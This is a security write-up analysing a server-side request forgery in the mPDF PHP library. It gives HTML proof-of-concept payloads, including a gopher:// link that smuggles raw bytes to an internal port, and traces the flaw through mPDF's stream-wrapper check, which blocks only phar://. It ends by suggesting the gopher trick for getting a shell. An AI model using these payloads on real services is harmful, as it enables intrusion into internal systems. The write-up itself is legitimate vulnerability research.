mPDF is a PHP library that generates PDF files from UTF-8 encoded HTML, as explained in the “About” section of its Git repository. With 940 forks and 3.7k stars, it is a widely used project, which makes it interesting to audit. As stated in the title of this chapter, it is possible to perform an SSRF (server-side request forgery) through it, and we will see how and why.

How?

When mPDF generates a PDF from attacker-controlled HTML, it fetches the stylesheets that the HTML links to, which makes an SSRF possible.

Example 1:

<head>
    <link rel="stylesheet" href="http://127.0.0.1:8000/ssrf_via_link_tag">
</head> 
<h1>test 1</h1>

Example 2:

<head>
    <link rel="stylesheet" href="gopher://127.0.0.1:8000/xRequest%20sent%20via%20gopher%20scheme%0a%0dThis%20is%20a%20POC.">
</head> 
<h1>test 2</h1>

To reproduce the examples locally, save them in an Input folder (the script below reads Input/test_0.html) and run the following PHP code:

<?php

require_once __DIR__ . '/vendor/autoload.php';

$mpdf = new \Mpdf\Mpdf();
$html = file_get_contents("Input/test_0.html");
$mpdf->WriteHTML($html);
$mpdf->Output();
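
To see the request arrive when reproducing the examples, something has to listen on 127.0.0.1:8000. The following is a minimal sketch of such a listener; the function name `captureOneRequest` and its parameters are hypothetical helpers for this article, not part of mPDF.

```php
<?php
// Hypothetical helper: accept a single TCP connection on an already-open
// server socket and return the first bytes the client sent.
function captureOneRequest($server, float $timeoutSeconds = 30.0, int $maxBytes = 4096): string
{
    $conn = @stream_socket_accept($server, $timeoutSeconds);
    if ($conn === false) {
        return ''; // nobody connected before the timeout
    }
    stream_set_timeout($conn, 2); // do not wait forever on a silent client
    $data = fread($conn, $maxBytes);
    fclose($conn);

    return $data === false ? '' : $data;
}

// Usage (blocks until a client connects or the timeout expires):
// $server = stream_socket_server('tcp://127.0.0.1:8000', $errno, $errstr);
// echo captureOneRequest($server);
```

Start the listener in one terminal, then run the PDF generation script in another; whatever mPDF sends while resolving the `<link>` tag should be printed by the listener.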

What is interesting is that the gopher:// scheme can be used, as example 2 shows: it lets the attacker choose the raw bytes sent to the target instead of a well-formed HTTP request. Now let’s look at why the code is vulnerable.
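
To make the payload of example 2 easier to read, here is a small sketch that decodes it. It assumes curl-style gopher handling, where the first character of the path (the `x` in the example) is the gopher item type and is not transmitted; `gopherPayload` is a hypothetical helper written for this article.

```php
<?php
// Sketch of how a gopher:// URL maps to raw bytes, assuming curl-style handling:
// the first character of the path is the gopher item type and is not sent.
function gopherPayload(string $url): string
{
    $path = parse_url($url, PHP_URL_PATH);
    if (!is_string($path) || strlen($path) < 2) {
        return ''; // no selector after the item type
    }

    // Drop the leading "/" and the one-character item type, then percent-decode.
    return rawurldecode(substr($path, 2));
}

$url = 'gopher://127.0.0.1:8000/xRequest%20sent%20via%20gopher%20scheme%0a%0dThis%20is%20a%20POC.';
// json_encode() makes the embedded line break characters visible.
echo json_encode(gopherPayload($url)), PHP_EOL;
```

Because the decoded bytes are attacker-chosen, the same trick can be used to speak other text-based protocols to internal services.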

Why?

Let’s go back to our PHP file:

File: test.php

<?php

require_once __DIR__ . '/vendor/autoload.php';

$mpdf = new \Mpdf\Mpdf();
$html = file_get_contents("Input/test_0.html");
$mpdf->WriteHTML($html);
$mpdf->Output();

The call to Mpdf::WriteHTML() ends up triggering a call to CssManager::ReadCSS().

File: vendor/mpdf/mpdf/src/Mpdf.php (via Composer) or src/Mpdf.php (via GitHub)


...

/**
 * Write HTML code to the document
 *
 * Also used internally to parse HTML into buffers
 *
 * @param string $html
 * @param int    $mode  Use HTMLParserMode constants. Controls what parts of the $html code is parsed.
 * @param bool   $init  Clears and sets buffers to Top level block etc.
 * @param bool   $close If false leaves buffers etc. in current state, so that it can continue a block etc.
 */
function WriteHTML($html, $mode = HTMLParserMode::DEFAULT_MODE, $init = true, $close = true)
{

    ...

    $html = $this->purify_utf8($html, false);
    if ($init) {
        $this->blklvl = 0;
        $this->lastblocklevelchange = 0;
        $this->blk = [];
        $this->initialiseBlock($this->blk[0]);
        $this->blk[0]['width'] = & $this->pgwidth;
        $this->blk[0]['inner_width'] = & $this->pgwidth;
        $this->blk[0]['blockContext'] = $this->blockContext;
    }

    $zproperties = [];
    if ($mode === HTMLParserMode::DEFAULT_MODE || $mode === HTMLParserMode::HEADER_CSS) {
        $this->ReadMetaTags($html);

        if (preg_match('/<base[^>]*href=["\']([^"\'>]*)["\']/i', $html, $m)) {
            $this->SetBasePath($m[1]);
        }
        $html = $this->cssManager->ReadCSS($html);

...

This function, CssManager::ReadCSS(), uses regular expressions to find <link> tags and collect their href values, as can be seen here:

File: vendor/mpdf/mpdf/src/CssManager.php (via Composer) or src/CssManager.php (via GitHub)


...

public function ReadCSS($html)
{

    ...

    $match = 0; // no match for instance
    $CSSext = [];

    // CSS inside external files
    $regexp = '/<link[^>]*rel=["\']stylesheet["\'][^>]*href=["\']([^>"\']*)["\'].*?>/si';
    $x = preg_match_all($regexp, $html, $cxt);
    if ($x) {
        $match += $x;
        $CSSext = $cxt[1];
    }
    $regexp = '/<link[^>]*href=["\']([^>"\']*)["\'][^>]*?rel=["\']stylesheet["\'].*?>/si';
    $x = preg_match_all($regexp, $html, $cxt);
    if ($x) {
        $match += $x;
        $CSSext = array_merge($CSSext, $cxt[1]);
    }

    ...

    $ind = 0;
    $CSSstr = '';

    if (!is_array($this->cascadeCSS)) {
        $this->cascadeCSS = [];
    }

    while ($match) {

        $path = $CSSext[$ind];

        $path = htmlspecialchars_decode($path); // mPDF 6

        $this->mpdf->GetFullPath($path);

        // mPDF 5.7.3
        if (strpos($path, '//') === false) {
            $path = preg_replace('/\.css\?.*$/', '.css', $path);
        }

        $CSSextblock = $this->assetFetcher->fetchDataFromPath($path);

...
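
To check what these two regular expressions capture, they can be run outside mPDF. In the sketch below the patterns are copied from the excerpt above, while the wrapper function `extractStylesheetUrls` and the sample HTML are illustrative and not part of the library.

```php
<?php
// Standalone sketch: the two patterns are copied from the ReadCSS() excerpt,
// the surrounding function is illustrative and not part of mPDF.
function extractStylesheetUrls(string $html): array
{
    $patterns = [
        // rel="stylesheet" appears before href
        '/<link[^>]*rel=["\']stylesheet["\'][^>]*href=["\']([^>"\']*)["\'].*?>/si',
        // href appears before rel="stylesheet"
        '/<link[^>]*href=["\']([^>"\']*)["\'][^>]*?rel=["\']stylesheet["\'].*?>/si',
    ];

    $urls = [];
    foreach ($patterns as $pattern) {
        if (preg_match_all($pattern, $html, $m)) {
            $urls = array_merge($urls, $m[1]);
        }
    }

    // ReadCSS() also decodes HTML entities in each path before fetching it.
    return array_map('htmlspecialchars_decode', $urls);
}

$html = '<head><link rel="stylesheet" href="gopher://127.0.0.1:8000/xPOC"></head><h1>test</h1>';
print_r(extractStylesheetUrls($html));
```

Nothing in the patterns restricts the scheme or the host, so any URL placed in the href attribute is passed on unchanged.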

The line that matters here is the one that fetches the stylesheet:


...

$CSSextblock = $this->assetFetcher->fetchDataFromPath($path);

...

File: vendor/mpdf/mpdf/src/AssetFetcher.php (via Composer) or src/AssetFetcher.php (via GitHub)


...

public function fetchDataFromPath($path, $originalSrc = null)
{
    /**
     * Prevents insecure PHP object injection through phar:// wrapper
     * @see https://github.com/mpdf/mpdf/issues/949
     * @see https://github.com/mpdf/mpdf/issues/1381
     */
    $wrapperChecker = new StreamWrapperChecker($this->mpdf);

    if ($wrapperChecker->hasBlacklistedStreamWrapper($path)) {
        throw new \Mpdf\Exception\AssetFetchingException('File contains an invalid stream. Only ' . implode(', ', $wrapperChecker->getWhitelistedStreamWrappers()) . ' streams are allowed.');
    }

    if ($originalSrc && $wrapperChecker->hasBlacklistedStreamWrapper($originalSrc)) {
        throw new \Mpdf\Exception\AssetFetchingException('File contains an invalid stream. Only ' . implode(', ', $wrapperChecker->getWhitelistedStreamWrappers()) . ' streams are allowed.');
    }

    $this->mpdf->GetFullPath($path);

    return $this->isPathLocal($path) || ($originalSrc !== null && $this->isPathLocal($originalSrc))
        ? $this->fetchLocalContent($path, $originalSrc)
        : $this->fetchRemoteContent($path);
}

...

As the comments indicate, only the phar:// wrapper is treated as dangerous. Let’s continue with the wrapper check itself.

File: vendor/mpdf/mpdf/src/File/StreamWrapperChecker.php (via Composer) or src/File/StreamWrapperChecker.php (via GitHub)


...

/**
 * @param string $filename
 * @return bool
 * @since 7.1.8
 */
public function hasBlacklistedStreamWrapper($filename)
{
    if (strpos($filename, '://') > 0) {
        $wrappers = stream_get_wrappers();
        $whitelistStreamWrappers = $this->getWhitelistedStreamWrappers();
        foreach ($wrappers as $wrapper) {
            if (in_array($wrapper, $whitelistStreamWrappers)) {
                continue;
            }

            if (stripos($filename, $wrapper . '://') === 0) {
                return true;
            }
        }
    }

    return false;
}

public function getWhitelistedStreamWrappers()
{
    return array_diff($this->mpdf->whitelistStreamWrappers, ['phar']); // remove 'phar' (security issue)
}

...
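
The check above only rejects schemes that PHP itself has registered as stream wrappers and that are not whitelisted. A scheme PHP does not know about is never compared against anything, so it passes. The sketch below restates that logic as a standalone function; `isRejected` is a hypothetical name, and the whitelist value is an assumption about the configuration, not something taken from the excerpt.

```php
<?php
// Standalone re-statement of the hasBlacklistedStreamWrapper() logic shown above.
// $registered stands in for stream_get_wrappers(); $whitelist is an assumed value.
function isRejected(string $filename, array $registered, array $whitelist): bool
{
    if (strpos($filename, '://') > 0) {
        foreach ($registered as $wrapper) {
            if (in_array($wrapper, $whitelist, true)) {
                continue; // explicitly allowed
            }
            if (stripos($filename, $wrapper . '://') === 0) {
                return true; // registered in PHP but not allowed
            }
        }
    }

    return false; // schemes PHP does not know about fall through to here
}

$whitelist = ['http', 'https', 'file']; // assumption, with 'phar' already removed
$registered = stream_get_wrappers();    // depends on the local PHP build

$candidates = ['phar://evil.phar/x', 'http://127.0.0.1:8000/', 'gopher://127.0.0.1:8000/x'];
foreach ($candidates as $candidate) {
    $verdict = var_export(isRejected($candidate, $registered, $whitelist), true);
    printf("%-28s rejected: %s\n", $candidate, $verdict);
}
```

Since gopher is not normally among the wrappers returned by stream_get_wrappers(), the gopher:// URL of example 2 is not rejected at this stage.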

Back in AssetFetcher::fetchDataFromPath(), a path that passes this check and is not local is handed to AssetFetcher::fetchRemoteContent($path), which is the call we are interested in:


...

public function fetchRemoteContent($path)
{
    $data = '';

    try {

        $this->logger->debug(sprintf('Fetching remote content of file "%s"', $path), ['context' => LogContext::REMOTE_CONTENT]);

        /** @var \Mpdf\Http\Response $response */
        $response = $this->http->sendRequest(new Request('GET', $path));

        if ($response->getStatusCode() !== 200) {

            $message = sprintf('Non-OK HTTP response "%s" on fetching remote content "%s" because of an error', $response->getStatusCode(), $path);
            if ($this->mpdf->debug) {
                throw new \Mpdf\MpdfException($message);
            }

            $this->logger->info($message);

            return $data;
        }

        $data = $response->getBody()->getContents();

    } catch (\InvalidArgumentException $e) {
        $message = sprintf('Unable to fetch remote content "%s" because of an error "%s"', $path, $e->getMessage());
        if ($this->mpdf->debug) {
            throw new \Mpdf\MpdfException($message, 0, $e);
        }

        $this->logger->warning($message);
    }

    return $data;
}

...

This lets us identify the line responsible for the SSRF:


...

$response = $this->http->sendRequest(new Request('GET', $path));

...

More precisely, it is the call to ClientInterface::sendRequest() that sends the request to the attacker-chosen URL.

I hope you enjoyed this short article and that it might help you obtain a shell during an audit via the gopher scheme, who knows?